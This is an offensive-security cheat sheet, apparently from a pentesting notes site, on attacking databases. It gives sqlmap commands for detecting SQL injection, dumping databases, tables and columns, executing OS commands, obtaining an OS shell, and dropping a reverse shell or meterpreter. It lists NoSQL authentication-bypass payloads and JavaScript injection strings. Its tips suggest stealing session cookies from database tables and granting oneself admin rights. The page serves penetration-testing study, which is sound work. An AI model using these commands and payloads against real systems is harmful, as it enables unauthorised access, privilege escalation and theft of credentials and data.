Databases
Basic Reconnaissance
Tips
If a database has a table of session one can try to steal cookies or other credentials from the table to authenticate as another user.
If one is in a database with write access and there are roles assigned to users, give the current user admin rights.
SQL Injection Cheat Sheets
Universal Structures
information_schema Metadata and all the databases and tables
information_schema.schemata Databases
information_schema.tables Tables
information_schema.columns Columns
sqlmap
GET
Discover vulnerabilities in databases as well as dump info
sqlmap -u <URL> --batch
POST
# With request file
# Add request into a log file (either from Burp or Chrome)
sqlmap -r <request_file> --batch
sqlmap -u <URL> --data "username=*&password=*"
Web sockets
sqlmap -u ws://<ip><port> --data <data>
Commands
To get data from any query use the --dump
option
# Get all databases
sqlmap -u <URL> --dbs
# Set DBMS
sqlmap -u <URL> --dbms="dbms"
# Database
sqlmap -u <URL> -D <database>
# Tables
sqlmap -u <URL> --tables -D <database>
## Specify table
sqlmap -u <URL> -D <database> -T <table>
# Columns
sqlmap -u <URL> --columns -D <database> -T <table>
Shell
To get upload web interface look for file stager
otherwise look for backdoor
in the output.
# Exec command
sqlmap -u <URL> --os-cmd <command>
# Simple Shell
sqlmap -u <URL> --os-shell
# Dropping a reverse-shell / meterpreter
sqlmap -u <URL> --os-pwn
File Upload
sqlmap -u <url> --data <data> --file-write <local_file> --file-dest <destination>
References
NoSQL
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
Authentication Bypass
DATA
username[$ne]=toto&password[$ne]=toto
login[$regex]=a.*&pass[$ne]=lol
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
SSJI
';return 'a'=='a' && ''=='
";return 'a'=='a' && ''=='
0;return true
NoSQLMap
Since the tool is using a menu based system, I'll just link the GitHub. Documentation and Release ​​
Last updated